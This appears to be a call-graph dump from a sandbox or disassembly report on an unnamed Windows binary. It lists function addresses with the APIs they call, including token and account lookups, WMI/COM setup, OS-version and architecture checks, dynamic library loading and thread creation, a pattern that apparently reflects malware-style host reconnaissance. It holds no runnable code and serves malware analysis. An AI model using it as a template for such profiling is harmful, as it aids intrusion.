14382->14386 14385 49a2046 _errno _strtoi64 _errno 14383->14385 14385->14381 14392 49a349d localeconv 14386->14392 14389 49a3480 _errno 14391 49a348c 14389->14391 14390 49a3471 14390->14389 14390->14391 14391->14381 14393 49a34ad strchr 14392->14393 14394 49a3448 _errno strtod 14392->14394 14393->14394 14394->14389 14394->14390 14396 49a1152 7 API calls 14395->14396 14397 49a2488 14396->14397 14398 49a1e0e 8 API calls 14397->14398 14400 49a24aa 14397->14400 14403 49a249e 14398->14403 14399 49a24c7 memchr 14399->14400 14399->14403 14400->14377 14401 49a257f 17 API calls 14401->14403 14402 49a1278 strncpy 14402->14403 14403->14399 14403->14400 14403->14401 14403->14402 14404 49a1e0e 8 API calls 14403->14404 14404->14403 14406 49a2394 14405->14406 14407 49a1e0e 8 API calls 14406->14407 14408 49a23af 14406->14408 14410 49a23a7 14407->14410 14408->14377 14409 49a257f 18 API calls 14409->14410 14410->14408 14410->14409 14411 49a1e0e 8 API calls 14410->14411 14411->14410 14412->13911 14414 4999e12 2 API calls 14413->14414 14415 49968b3 14414->14415 14416 499e712 14415->14416 14417 4999df2 2 API calls 14416->14417 14418 499e727 14417->14418 14567 499e400 CoInitializeEx CoInitializeSecurity CoCreateInstance 14418->14567 14421 4998baf 2 API calls 14422 499e73f 14421->14422 14423 4999df2 2 API calls 14422->14423 14438 49968b8 14422->14438 14424 499e753 14423->14424 14425 4999df2 2 API calls 14424->14425 14426 499e764 14425->14426 14574 499e656 SysAllocString SysAllocString 14426->14574 14428 499e775 14429 499e7a3 14428->14429 14430 49998bd RtlAllocateHeap 14428->14430 14431 4998baf 2 API calls 14429->14431 14432 499e784 VariantClear 14430->14432 14433 499e7ac 14431->14433 14432->14429 14435 4998baf 2 API calls 14433->14435 14436 499e7b5 14435->14436 14580 499e4b4 14436->14580 14438->13918 14440 4999df2 2 API calls 14439->14440 14441 499e7db 14440->14441 14442 499e400 6 API calls 14441->14442 14443 499e7e5 14442->14443 14444 4998baf 2 API calls 14443->14444 14445 499e7f3 14444->14445 14446 499696c 14445->14446 14447 4999df2 2 API calls 14445->14447 14462 499e87a 14446->14462 14448 499e807 14447->14448 14449 4999df2 2 API calls 14448->14449 14450 499e818 14449->14450 14451 499e656 10 API calls 14450->14451 14452 499e829 14451->14452 14453 499e857 14452->14453 14454 49998bd RtlAllocateHeap 14452->14454 14455 4998baf 2 API calls 14453->14455 14456 499e838 VariantClear 14454->14456 14457 499e860 14455->14457 14456->14453 14459 4998baf 2 API calls 14457->14459 14460 499e869 14459->14460 14461 499e4b4 2 API calls 14460->14461 14461->14446 14463 4999df2 2 API calls 14462->14463 14464 499e88f 14463->14464 14465 499e400 6 API calls 14464->14465 14466 499e899 14465->14466 14467 4998baf 2 API calls 14466->14467 14468 499e8a7 14467->14468 14469 4996974 14468->14469 14470 4999df2 2 API calls 14468->14470 14485 4996f6c 14469->14485 14471 499e8bb 14470->14471 14472 4999df2 2 API calls 14471->14472 14473 499e8cc 14472->14473 14474 499e656 10 API calls 14473->14474 14475 499e8dd 14474->14475 14476 499e90b 14475->14476 14477 49998bd RtlAllocateHeap 14475->14477 14478 4998baf 2 API calls 14476->14478 14479 499e8ec VariantClear 14477->14479 14480 499e914 14478->14480 14479->14476 14482 4998baf 2 API calls 14480->14482 14483 499e91d 14482->14483 14484 499e4b4 2 API calls 14483->14484 14484->14469 14585 4998bde RtlAllocateHeap 14485->14585 14487 4996f74 14488 4996f9d 14487->14488 14586 4998bde RtlAllocateHeap 14487->14586 14488->13931 14490 4996f85 14490->14488 14587 499ba09 14490->14587 14494 4998d6d memset 14493->14494 14495 499b6f2 14494->14495 14496 4998d6d memset 14495->14496 14497 499b6fe 14496->14497 14498 499b856 14497->14498 14501 4996a94 14497->14501 14591 4998bde RtlAllocateHeap 14497->14591 14500 4998bf4 2 API calls 14498->14500 14500->14501 14501->13960 14502 4999a07 2 API calls 14504 499b76d 14502->14504 14503 4999880 RtlAllocateHeap 14503->14504 14504->14498 14504->14501 14504->14502 14504->14503 14505 4998bf4 2 API calls 14504->14505 14506 499b81c 14504->14506 14505->14504 14506->14498 14507 4999930 2 API calls 14506->14507 14508 499b83f 14507->14508 14508->14498 14509 499b845 14508->14509 14510 4998bf4 2 API calls 14509->14510 14510->14501 14568 499e445 SysAllocString 14567->14568 14573 499e482 14567->14573 14569 499e460 14568->14569 14570 499e464 CoSetProxyBlanket 14569->14570 14569->14573 14571 499e47b 14570->14571 14570->14573 14584 4998bde RtlAllocateHeap 14571->14584 14573->14421 14575 4999df2 2 API calls 14574->14575 14576 499e681 SysAllocString 14575->14576 14577 4998baf 2 API calls 14576->14577 14579 499e694 SysFreeString SysFreeString SysFreeString 14577->14579 14579->14428 14582 499e4bf 14580->14582 14581 4998bf4 2 API calls 14583 499e4dc 14581->14583 14582->14581 14583->14438 14584->14573 14585->14487 14586->14490 14588 499ba25 14587->14588 14589 4998d6d memset 14588->14589 14590 4996f99 14588->14590 14589->14590 14590->13931 14591->14504 14603 49a03dd GetTickCount 14602->14603 14604 49a03cc __aulldiv 14602->14604 14603->14068 14604->14068 14606 49a1152 7 API calls 14605->14606 14607 499803c 14606->14607 14608 4998753 strncpy 14607->14608 14609 4998055 14608->14609 14610 4998753 strncpy 14609->14610 14611 4998069 14610->14611 14612 4998753 strncpy 14611->14612 14613 499807a 14612->14613 14614 4998753 strncpy 14613->14614 14615 499808b 14614->14615 14616 4998753 strncpy 14615->14616 14617 49980a1 14616->14617 14618 4998753 strncpy 14617->14618 14619 49980b5 14618->14619 14620 4998753 strncpy 14619->14620 14621 49980ce 14620->14621 14622 4998753 strncpy 14621->14622 14623 49980e2 14622->14623 14624 4998753 strncpy 14623->14624 14625 49980f6 14624->14625 14626 4998753 strncpy 14625->14626 14627 499810a 14626->14627 14628 4998753 strncpy 14627->14628 14629 4998120 14628->14629 14630 4998753 strncpy 14629->14630 14631 4998137 14630->14631 14755 49987af 14631->14755 14634 4998753 strncpy 14635 499814a 14634->14635 14636 4998753 strncpy 14635->14636 14637 499815e 14636->14637 14638 4998753 strncpy 14637->14638 14639 4998172 14638->14639 14640 49987af 5 API calls 14639->14640 14641 499817a 14640->14641 14642 4998753 strncpy 14641->14642 14643 4998185 14642->14643 14644 49987af 5 API calls 14643->14644 14645 499818d 14644->14645 14646 4998753 strncpy 14645->14646 14647 4998198 14646->14647 14648 49987af 5 API calls 14647->14648 14649 49981a0 14648->14649 14650 4998753 strncpy 14649->14650 14651 49981ab 14650->14651 14652 4998753 strncpy 14651->14652 14653 49981bf 14652->14653 14654 49987af 5 API calls 14653->14654 14655 49981c7 14654->14655 14656 4998753 strncpy 14655->14656 14657 49981d2 14656->14657 14658 4998753 strncpy 14657->14658 14659 49981ec 14658->14659 14660 49987af 5 API calls 14659->14660 14661 49981f4 14660->14661 14662 4998753 strncpy 14661->14662 14663 49981ff 14662->14663 14664 4998753 strncpy 14663->14664 14665 4998213 14664->14665 14666 4998753 strncpy 14665->14666 14667 4998227 14666->14667 14668 49987af 5 API calls 14667->14668 14669 499823b 14668->14669 14670 4998753 strncpy 14669->14670 14671 4998246 14670->14671 14672 4998753 strncpy 14671->14672 14673 499825a 14672->14673 14674 4998753 strncpy 14673->14674 14675 499826e 14674->14675 14676 49987af 5 API calls 14675->14676 14677 4998279 14676->14677 14678 4998753 strncpy 14677->14678 14679 4998284 14678->14679 14680 49987af 5 API calls 14679->14680 14681 499828f 14680->14681 14682 4998753 strncpy 14681->14682 14683 499829a 14682->14683 14684 49987af 5 API calls 14683->14684 14760 499996c 14755->14760 14757 499813f 14757->14634 14758 49987c2 14758->14757 14759 4998bf4 2 API calls 14758->14759 14759->14757 14761 499997b WideCharToMultiByte 14760->14761 14768 49999cb 14760->14768 14762 4999996 14761->14762 14761->14768 14769 4998bde RtlAllocateHeap 14762->14769 14764 499999f 14765 49999a7 WideCharToMultiByte 14764->14765 14764->14768 14766 49999c0 14765->14766 14765->14768 14767 4998bf4 2 API calls 14766->14767 14767->14768 14768->14758 14769->14764 14771 499971d 14770->14771 14772 49a3674 2 API calls 14771->14772 14773 4999767 14772->14773 14774 4997a02 14773->14774 14775 49a3674 2 API calls 14773->14775 14774->14086 14775->14773 14777 49a1152 7 API calls 14776->14777 14778 4997e07 14777->14778 14779 4998753 strncpy 14778->14779 14780 4997e1d 14779->14780 14781 4998753 strncpy 14780->14781 14782 4997e32 14781->14782 14783 4998753 strncpy 14782->14783 14784 4997e46 14783->14784 14785 4998753 strncpy 14784->14785 14786 4997e5b 14785->14786 14787 4998753 strncpy 14786->14787 14788 4997e6c 14787->14788 14789 4998753 strncpy 14788->14789 14790 4997e85 14789->14790 14791 4998753 strncpy 14790->14791 14792 4997e9b 14791->14792 14793 4998753 strncpy 14792->14793 14794 4997eac 14793->14794 14795 4998753 strncpy 14794->14795 14796 4997ec0 14795->14796 14797 4998753 strncpy 14796->14797 14798 4997ed3 14797->14798 14799 4998753 strncpy 14798->14799 14800 4997ee7 14799->14800 14801 4998753 strncpy 14800->14801 14802 4997f06 14801->14802 14803 49987af 5 API calls 14802->14803 14804 4997f17 14803->14804 14805 4998753 strncpy 14804->14805 14806 4997f22 14805->14806 14807 49987af 5 API calls 14806->14807 14808 4997f33 14807->14808 14809 4998753 strncpy 14808->14809 14810 4997f3e 14809->14810 14811 4998753 strncpy 14810->14811 14812 4997f5a 14811->14812 14813 49a1bd3 13 API calls 14812->14813 14814 4997f62 14813->14814 14814->14090 14816 49a1cc0 18 API calls 14815->14816 14817 4997876 14816->14817 14818 4999edb memset 14817->14818 14821 4997882 14817->14821 14819 49978b6 14818->14819 14819->14821 14857 4998bde RtlAllocateHeap 14819->14857 14821->14101 14822 499798e 14823 4998bf4 2 API calls 14822->14823 14825 499799f 14822->14825 14823->14822 14824 499793a 14824->14821 14824->14822 14826 4999880 RtlAllocateHeap 14824->14826 14827 4998bf4 2 API calls 14825->14827 14826->14824 14827->14821 14829 499773f 14828->14829 14830 499c307 2 API calls 14829->14830 14838 49977cf 14829->14838 14831 499775b 14830->14831 14831->14838 14841 49977a7 14831->14841 14858 4998bde RtlAllocateHeap 14831->14858 14833 4998bf4 2 API calls 14835 49977c5 14833->14835 14834 4997778 14837 4999e12 2 API calls 14834->14837 14834->14841 14836 4998bf4 2 API calls 14835->14836 14836->14838 14839 4997797 14837->14839 14838->14107 14842 4991190 14838->14842 14859 49989dd 14839->14859 14841->14833 14843 499111d 8 API calls 14842->14843 14844 49911a1 14843->14844 14845 49911ae 14844->14845 14846 4998d6d memset 14844->14846 14845->14105 14847 49911c4 14846->14847 14848 4991dd3 6 API calls 14847->14848 14849 49911d4 14848->14849 14849->14105 14875 4997f75 14850->14875 14852 49976f4 14853 4997611 19 API calls 14852->14853 14854 4997714 14853->14854 14855 4998bf4 2 API calls 14854->14855 14856 499771f 14855->14856 14856->14107 14857->14824 14858->14834 14862 4998871 14859->14862 14869 49987e5 14862->14869 14864 49988ca GetLastError 14868 4998959 14864->14868 14865 4998bf4 2 API calls 14866 499889e 14865->14866 14866->14841 14867 4998897 14867->14864 14867->14866 14867->14868 14868->14865 14874 4998bde RtlAllocateHeap 14869->14874 14871 49987f6 14872 499883d lstrlenA 14871->14872 14873 499884e 14871->14873 14872->14873 14873->14867 14873->14873 14874->14871 14876 49a1152 7 API calls 14875->14876 14877 4997f84 14876->14877 14878 4998753 strncpy 14877->14878 14879 4997f9a 14878->14879 14880 4998753 strncpy 14879->14880 14881 4997fae 14880->14881 14882 4998753 strncpy 14881->14882 14883 4997fbf 14882->14883 14884 4998753 strncpy 14883->14884 14885 4997fd0 14884->14885 14886 4998753 strncpy 14885->14886 14887 4997fe5 14886->14887 14888 4998753 strncpy 14887->14888 14889 4997ffb 14888->14889 14890 4998753 strncpy 14889->14890 14891 4998011 14890->14891 14892 49a1bd3 13 API calls 14891->14892 14893 4998019 14892->14893 14893->14852 14895 4999e12 2 API calls 14894->14895 14896 49910df 14895->14896 14896->14125 14918 49a083c 14921 4998bde RtlAllocateHeap 14918->14921 14920 49a084c 14921->14920 13332 49959b1 13333 4999d18 4 API calls 13332->13333 13334 49959c9 13333->13334 13350 4995ab2 13334->13350 13351 4998bde RtlAllocateHeap 13334->13351 13336 49959e0 13337 4999dd8 2 API calls 13336->13337 13336->13350 13338 49959f8 13337->13338 13339 4999e12 2 API calls 13338->13339 13340 4995a0d 13339->13340 13341 4998b9c 2 API calls 13340->13341 13342 4995a15 13341->13342 13343 4998bf4 2 API calls 13342->13343 13344 4995a30 13343->13344 13345 499b5fb 2 API calls 13344->13345 13347 4995a3e 13345->13347 13346 499bfdb 11 API calls 13346->13347 13347->13346 13348 4995aa7 13347->13348 13349 4998bf4 2 API calls 13348->13349 13349->13350 13351->13336 13043 499632e 13044 499633e ExitProcess 13043->13044 13383 49929a1 13384 4992a06 13383->13384 13389 49929b5 13383->13389 13385 49929f5 13384->13385 13395 4991b48 13384->13395 13387 4999c2c 2 API calls 13385->13387 13388 4992a20 13387->13388 13389->13385 13390 499aa65 6 API calls 13389->13390 13391 49929e2 13390->13391 13392 499aa65 6 API calls 13391->13392 13393 49929ed 13392->13393 13394 499aa65 6 API calls 13393->13394 13394->13385 13396 4991b5d 13395->13396 13397 4991bc7 13396->13397 13399 499a065 GetSystemTimeAsFileTime 13396->13399 13401 4991c58 13396->13401 13398 499a065 GetSystemTimeAsFileTime 13397->13398 13400 4991bd1 GetCurrentThread 13398->13400 13399->13396 13403 4991bf8 DuplicateHandle 13400->13403 13401->13385 13404 4998d6d memset 13403->13404 13405 4991c0b 13404->13405 13415 4992c5b 13405->13415 13409 4991c3e 13410 4991c4d 13409->13410 13449 4996d74 13409->13449 13413 4998bf4 2 API calls 13410->13413 13411 4991c2b 13411->13409 13414 499aa65 6 API calls 13411->13414 13413->13401 13414->13409 13416 499a9b8 4 API calls 13415->13416 13417 4992c64 13416->13417 13418 4991c1b 13417->13418 13419 4992be4 9 API calls 13417->13419 13424 49919ec 13418->13424 13422 4992c79 13419->13422 13420 4992c94 13420->13418 13421 4999880 RtlAllocateHeap 13420->13421 13421->13418 13422->13420 13423 4999880 RtlAllocateHeap 13422->13423 13423->13420 13425 4991a0c 13424->13425 13426 4991a50 13424->13426 13427 499a9b8 4 API calls 13425->13427 13428 499a96c 4 API calls 13426->13428 13441 4991ac6 13426->13441 13430 4991a14 13427->13430 13432 4991a73 13428->13432 13431 499a96c 4 API calls 13430->13431 13435 4991a20 13431->13435 13433 4991aab 13432->13433 13480 49916e5 13432->13480 13484 499158a 13433->13484 13434 4991ace 13434->13411 13437 4991a3d 13435->13437 13476 4999edb 13435->13476 13436 4991b2e 13439 4998bf4 2 API calls 13436->13439 13440 4998bf4 2 API calls 13437->13440 13439->13434 13440->13426 13441->13434 13495 499171a 13441->13495 13445 4999edb memset 13447 4991adf 13445->13447 13446 4999edb memset 13446->13433 13447->13434 13447->13436 13447->13445 13448 499158a 7 API calls 13447->13448 13448->13447 13450 4998bf4 2 API calls 13449->13450 13451 4996d94 13450->13451 13452 4998bf4 2 API calls 13451->13452 13453 4996d9e 13452->13453 13454 4998bf4 2 API calls 13453->13454 13455 4996da8 13454->13455 13456 4998bf4 2 API calls 13455->13456 13457 4996db2 13456->13457 13458 4998bf4 2 API calls 13457->13458 13459 4996dbc 13458->13459 13460 4998bf4 2 API calls 13459->13460 13461 4996dc6 13460->13461 13462 4998bf4 2 API calls 13461->13462 13470 4996dd0 13462->13470 13463 4996e6e 13467 4998bf4 2 API calls 13463->13467 13464 4998bf4 2 API calls 13468 4996e85 13464->13468 13465 4998bf4 2 API calls 13469 4996e36 13465->13469 13466 4998bf4 2 API calls 13473 4996e3e 13466->13473 13471 4996e76 13467->13471 13468->13410 13472 4998bf4 2 API calls 13469->13472 13470->13473 13474 4998bf4 HeapFree memset 13470->13474 13475 4996e28 13470->13475 13471->13464 13472->13473 13473->13463 13473->13466 13473->13471 13474->13470 13475->13465 13477 4999ee7 13476->13477 13478 4999f0c 13477->13478 13479 4999f00 memset 13477->13479 13478->13437 13479->13478 13481 49916ee 13480->13481 13482 49a3674 2 API calls 13481->13482 13483 499170c 13481->13483 13482->13481 13483->13446 13485 499a065 GetSystemTimeAsFileTime 13484->13485 13486 49915a5 13485->13486 13487 499a065 GetSystemTimeAsFileTime 13486->13487 13488 49915ad 13487->13488 13489 499a205 6 API calls 13488->13489 13491 49915d2 13489->13491 13490 49915da 13490->13441 13491->13490 13492 499161a 13491->13492 13493 499a065 GetSystemTimeAsFileTime 13491->13493 13494 499a15b 2 API calls 13492->13494 13493->13491 13494->13490 13532 499ab05 13495->13532 13498 4991774 13499 4998bf4 2 API calls 13498->13499 13501 499178a 13499->13501 13502 4991080 2 API calls 13501->13502 13503 4991794 13502->13503 13504 499b1a4 7 API calls 13503->13504 13505 49917af 13504->13505 13506 4998b9c 2 API calls 13505->13506 13507 49917bd 13506->13507 13508 4991828 13507->13508 13509 4991080 2 API calls 13507->13509 13520 4991830 13508->13520 13539 4998bde RtlAllocateHeap 13508->13539 13511 49917cc 13509->13511 13513 4998f2e 4 API calls 13511->13513 13512 4991843 13524 499a96c 4 API calls 13512->13524 13527 49919b8 13512->13527 13514 49917dc 13513->13514 13516 4998b9c 2 API calls 13514->13516 13515 4998bf4 2 API calls 13517 49919cb 13515->13517 13518 49917e9 13516->13518 13519 4998bf4 2 API calls 13517->13519 13521 4991663 3 API calls 13518->13521 13523 4991805 13518->13523 13519->13520 13520->13447 13521->13523 13522 4998bf4 2 API calls 13525 499181e 13522->13525 13523->13522 13531 499191d 13524->13531 13526 49992de 6 API calls 13525->13526 13526->13508 13527->13515 13528 49a3674 2 API calls 13528->13531 13529 499198e 13529->13527 13530 49916e5 2 API calls 13529->13530 13530->13529 13531->13528 13531->13529 13533 499ab20 4 API calls 13532->13533 13534 4991758 13533->13534 13534->13498 13535 4991663 13534->13535 13536 4991680 13535->13536 13537 4998c72 3 API calls 13536->13537 13538 49916d5 13536->13538 13537->13536 13538->13498 13539->13512 13580 49928a4 13581 49928ba 13580->13581 13598 4992959 13580->13598 13582 499c307 2 API calls 13581->13582 13584 49928c7 13582->13584 13583 4999c2c 2 API calls 13585 4992966 13583->13585 13602 4999d81 13584->13602 13588 4999930 2 API calls 13589 49928d5 13588->13589 13590 499109a 2 API calls 13589->13590 13589->13598 13591 49928e8 13590->13591 13592 4999a5a 2 API calls 13591->13592 13593 4992900 13592->13593 13594 4998baf 2 API calls 13593->13594 13595 499290e 13594->13595 13597 499b5fb 2 API calls 13595->13597 13601 499294c 13595->13601 13596 4998bf4 2 API calls 13596->13598 13599 499292c 13597->13599 13598->13583 13600 4998bf4 2 API calls 13599->13600 13600->13601 13601->13596 13603 49928ce 13602->13603 13604 4999d8a 13602->13604 13603->13588 13606 4998bde RtlAllocateHeap 13604->13606 13606->13603 13709 49926ec 13710 4992715 13709->13710 13711 49926fd 13709->13711 13740 49926b3 13710->13740 13717 4997002 13711->13717 13715 4999c2c 2 API calls 13716 499272e 13715->13716 13718 4997024 13717->13718 13731 499701c 13717->13731 13719 499c307 2 API calls 13718->13719 13720 499702d 13719->13720 13720->13731 13747 49a0e2d 13720->13747 13723 4997047 13724 4998bf4 2 API calls 13723->13724 13724->13731 13725 499979d 7 API calls 13726 499707a 13725->13726 13727 49965f6 5 API calls 13726->13727 13726->13731 13728 499708c 13727->13728 13729 4997099 13728->13729 13732 49970b1 13728->13732 13730 4998bf4 2 API calls 13729->13730 13730->13731 13731->13710 13733 4995e3c 8 API calls 13732->13733 13739 49970d1 13732->13739 13736 49970cd 13733->13736 13734 4998bf4 2 API calls 13735 49970fe 13734->13735 13737 4998bf4 2 API calls 13735->13737 13738 499aa65 6 API calls 13736->13738 13736->13739 13737->13723 13738->13739 13739->13734 13741 499c307 2 API calls 13740->13741 13742 49926c4 13741->13742 13745 49926db 13742->13745 13746 49926e8 13742->13746 13758 499ac2f 13742->13758 13744 4998bf4 2 API calls 13744->13746 13745->13744 13746->13715 13748 49a0e78 13747->13748 13749 49a0e3c 13747->13749 13757 4998bde RtlAllocateHeap 13748->13757 13750 4998bf4 2 API calls 13749->13750 13752 49a0e45 13750->13752 13753 4998c43 RtlAllocateHeap 13752->13753 13755 4997041 13752->13755 13754 49a0e5c 13753->13754 13754->13755 13756 499fba1 lstrlenW 13754->13756 13755->13723 13755->13725 13756->13755 13757->13752 13759 499ac4b 6 API calls 13758->13759 13760 499ac46 13759->13760 13760->13745 11227 49964ef 11228 4996555 11227->11228 11229 49964fd 11227->11229 11256 4998bc9 HeapCreate 11229->11256 11231 4996502 11257 4999591 11231->11257 11240 499655a 11277 4998baf 11240->11277 11241 4996550 11242 4998baf 2 API calls 11241->11242 11242->11228 11249 49965b1 CreateThread 11249->11228 11357 4996298 11249->11357 11250 499f05c 8 API calls 11251 499658c 11250->11251 11290 4996370 memset 11251->11290 11256->11231 11309 4998bde RtlAllocateHeap 11257->11309 11259 4996507 11260 49a3cd5 11259->11260 11261 49a3d0a 11260->11261 11310 4998c43 11261->11310 11263 4996515 11264 499f05c 11263->11264 11314 4999dd8 11264->11314 11267 499f07e GetModuleHandleA 11269 499f08d 11267->11269 11268 499f086 LoadLibraryA 11268->11269 11270 499f09b 11269->11270 11317 499f011 11269->11317 11322 4998b9c 11270->11322 11274 4999df2 11340 4998ac6 11274->11340 11278 4998bbd 11277->11278 11279 499655f 11277->11279 11280 4998bf4 2 API calls 11278->11280 11281 499109a 11279->11281 11280->11279 11282 4998ac6 2 API calls 11281->11282 11283 49910b5 11282->11283 11284 4999cb5 11283->11284 11286 4999cd1 11284->11286 11285 4996573 11285->11249 11285->11250 11286->11285 11346 4998bde RtlAllocateHeap 11286->11346 11288 4999ce4 11288->11285 11289 4998bf4 2 API calls 11288->11289 11289->11285 11347 4991080 11290->11347 11292 499639c 11293 49963ad 11292->11293 11294 49963ec 11292->11294 11296 4991080 2 API calls 11293->11296 11295 4991080 2 API calls 11294->11295 11298 49963f6 11295->11298 11297 49963b5 11296->11297 11350 4999e12 11297->11350 11302 4998b9c 2 API calls 11298->11302 11300 49963cb 11301 4998b9c 2 API calls 11300->11301 11303 49963d6 11301->11303 11302->11303 11304 4998bf4 11303->11304 11305 49965a1 11304->11305 11306 4998bfe 11304->11306 11305->11249 11306->11305 11307 4998d6d memset 11306->11307 11308 4998c2e HeapFree 11307->11308 11308->11305 11309->11259 11313 4998bde RtlAllocateHeap 11310->11313 11312 4998c54 11312->11263 11313->11312 11326 49989ef 11314->11326 11333 4998bde RtlAllocateHeap 11317->11333 11319 499f023 11321 499f052 11319->11321 11334 499eebb 11319->11334 11321->11270 11323 499652b 11322->11323 11324 4998ba4 11322->11324 11323->11274 11325 4998bf4 2 API calls 11324->11325 11325->11323 11327 4998a12 lstrlenA 11326->11327 11329 4998a78 11327->11329 11331 4998a81 11327->11331 11332 4998bde RtlAllocateHeap 11329->11332 11331->11267 11331->11268 11332->11331 11333->11319 11335 499ef2f 11334->11335 11336 499eed4 11334->11336 11335->11319 11336->11335 11337 499ef87 LoadLibraryA 11336->11337 11337->11335 11338 499ef95 GetProcAddress 11337->11338 11338->11335 11339 499efa1 11338->11339 11339->11335 11342 4998ae4 lstrlenA 11340->11342 11345 4998bde RtlAllocateHeap 11342->11345 11344 499653c GetFileAttributesW 11344->11240 11344->11241 11345->11344 11346->11288 11348 49989ef 2 API calls 11347->11348 11349 4991096 11348->11349 11349->11292 11354 4998d6d 11350->11354 11353 4999e40 11353->11300 11355 4998d87 _vsnprintf 11354->11355 11356 4998d76 memset 11354->11356 11355->11353 11356->11355 11369 4996412 11357->11369 11361 49962a9 11363 49962e3 11361->11363 11368 49962b3 11361->11368 11432 499d804 11361->11432 11364 499631a 11363->11364 11365 4996313 11363->11365 11364->11368 11470 49935a1 11364->11470 11448 499611b 11365->11448 11370 499f05c 8 API calls 11369->11370 11371 4996426 11370->11371 11372 499f05c 8 API calls 11371->11372 11373 499643f 11372->11373 11374 499f05c 8 API calls 11373->11374 11375 4996458 11374->11375 11376 499f05c 8 API calls 11375->11376 11377 4996471 11376->11377 11378 499f05c 8 API calls 11377->11378 11379 499648a 11378->11379 11380 499f05c 8 API calls 11379->11380 11381 49964a1 11380->11381 11382 499f05c 8 API calls 11381->11382 11383 49964b8 11382->11383 11384 499f05c 8 API calls 11383->11384 11385 49964cf 11384->11385 11386 499f05c 8 API calls 11385->11386 11387 499629d GetOEMCP 11386->11387 11388 499df3d 11387->11388 11477 4998bde RtlAllocateHeap 11388->11477 11390 499df58 11391 499e2b8 11390->11391 11392 499df63 GetCurrentProcessId 11390->11392 11391->11361 11393 499df7b 11392->11393 11478 499c879 11393->11478 11395 499dfce 11396 499dfdf 11395->11396 11485 499c8c9 11395->11485 11494 499f3a3 11396->11494 11401 499e014 LookupAccountSidW 11402 499e05e GetLastError 11401->11402 11403 499e064 GetSystemMetrics 11401->11403 11402->11403 11405 499e08b 11403->11405 11503 499c6ce 11405->11503 11410 499e0c6 11520 499c6e4 11410->11520 11415 4998d6d memset 11416 499e11d GetVersionExA 11415->11416 11539 499dd39 11416->11539 11420 499e13b GetWindowsDirectoryW 11421 4999df2 2 API calls 11420->11421 11422 499e15e 11421->11422 11423 4998baf 2 API calls 11422->11423 11424 499e198 11423->11424 11426 499e1d0 11424->11426 11562 4999e51 11424->11562 11545 49a351a 11426->11545 11641 499d6dc 11432->11641 11435 499d950 11435->11363 11437 499d945 11438 4998bf4 2 API calls 11437->11438 11438->11435 11439 499d933 11439->11437 11440 4998bf4 2 API calls 11439->11440 11440->11439 11441 4998d6d memset 11447 499d841 11441->11447 11444 499d8b4 GetLastError 11671 499da57 ResumeThread 11444->11671 11446 499d8de FindCloseChangeNotification 11446->11447 11447->11437 11447->11439 11447->11441 11447->11444 11447->11446 11653 499bc84 11447->11653 11658 499d959 11447->11658 11741 499a608 11448->11741 11451 499612a 11451->11368 11452 4996142 11757 4996247 11452->11757 11455 4996147 11456 4996151 11455->11456 11457 49961a0 11455->11457 11459 49961a5 11456->11459 11460 4996156 11456->11460 11791 499600c 11457->11791 11461 499619e 11459->11461 11462 49961c1 11459->11462 11804 49a0a67 11459->11804 11460->11462 11465 499b557 7 API calls 11460->11465 11825 4995ff2 11461->11825 11462->11368 11466 4996176 11465->11466 11768 4995edd 11466->11768 13041 4998bde RtlAllocateHeap 11470->13041 11472 49935a8 11473 49935df 11472->11473 13042 4998bde RtlAllocateHeap 11472->13042 11473->11368 11475 49935b9 11475->11473 11476 49996da 2 API calls 11475->11476 11476->11473 11477->11390 11479 499c890 11478->11479 11480 499c894 11479->11480 11566 499c862 11479->11566 11480->11395 11483 499c8b9 FindCloseChangeNotification 11484 499c8a5 11483->11484 11484->11395 11579 499c79e GetCurrentThread OpenThreadToken 11485->11579 11488 499c97f 11488->11396 11489 499c7f5 6 API calls 11493 499c8fd FindCloseChangeNotification 11489->11493 11491 499c975 11492 4998bf4 2 API calls 11491->11492 11492->11488 11493->11488 11493->11491 11495 499f3c2 11494->11495 11497 499e009 11495->11497 11584 49998bd 11495->11584 11498 499f368 11497->11498 11499 499f37f 11498->11499 11500 499f39f 11499->11500 11501 49998bd RtlAllocateHeap 11499->11501 11500->11401 11502 499f38c 11501->11502 11502->11401 11589 499c5ec 11503->11589 11505 499c6e2 11506 499c4c1 11505->11506 11507 499c4dc 11506->11507 11508 4999dd8 2 API calls 11507->11508 11509 499c4e6 11508->11509 11604 49a3674 11509->11604 11511 499c4fb 11512 499c531 11511->11512 11515 49a3674 2 API calls 11511->11515 11513 4998b9c 2 API calls 11512->11513 11514 499c53d 11513->11514 11516 49999df 11514->11516 11515->11511 11517 49999eb MultiByteToWideChar 11516->11517 11518 49999e6 11516->11518 11519 49999ff 11517->11519 11518->11410 11519->11410 11521 4999dd8 2 API calls 11520->11521 11522 499c6fd 11521->11522 11523 4999dd8 2 API calls 11522->11523 11525 499c709 11523->11525 11524 499c799 11533 499ca46 11524->11533 11525->11524 11526 49a3674 2 API calls 11525->11526 11527 499c75a 11525->11527 11526->11525 11528 49a3674 2 API calls 11527->11528 11529 499c785 11527->11529 11528->11527 11530 4998b9c 2 API calls 11529->11530 11531 499c791 11530->11531 11532 4998b9c 2 API calls 11531->11532 11532->11524 11534 499ca5e 11533->11534 11535 499c7f5 6 API calls 11534->11535 11536 499ca62 11534->11536 11538 499ca76 11535->11538 11536->11415 11537 4998bf4 2 API calls 11537->11536 11538->11536 11538->11537 11540 499dd5f 11539->11540 11541 499dd4e GetCurrentProcess IsWow64Process 11539->11541 11542 499dd62 11540->11542 11541->11540 11543 499dd6c 11542->11543 11544 499dd71 GetSystemInfo 11542->11544 11543->11420 11544->11420 11546 499e299 11545->11546 11547 49a3525 11545->11547 11549 49996da 11546->11549 11547->11546 11548 49a3674 2 API calls 11547->11548 11548->11547 11609 4999662 11549->11609 11563 4998d6d memset 11562->11563 11564 4999e65 _vsnwprintf 11563->11564 11565 4999e82 11564->11565 11565->11426 11569 499c7f5 GetTokenInformation 11566->11569 11570 499c834 11569->11570 11571 499c817 GetLastError 11569->11571 11570->11483 11570->11484 11571->11570 11572 499c822 11571->11572 11578 4998bde RtlAllocateHeap 11572->11578 11574 499c82a 11574->11570 11575 499c838 GetTokenInformation 11574->11575 11575->11570 11576 499c84d 11575->11576 11577 4998bf4 2 API calls 11576->11577 11577->11570 11578->11574 11580 499c7bf GetLastError 11579->11580 11582 499c7eb 11579->11582 11581 499c7cc OpenProcessToken 11580->11581 11580->11582 11581->11582 11582->11488 11582->11489 11585 49998c6 11584->11585 11587 49998d8 11584->11587 11588 4998bde RtlAllocateHeap 11585->11588 11587->11497 11588->11587 11590 4998d6d memset 11589->11590 11591 499c60e lstrcpynW 11590->11591 11593 4999df2 2 API calls 11591->11593 11594 499c643 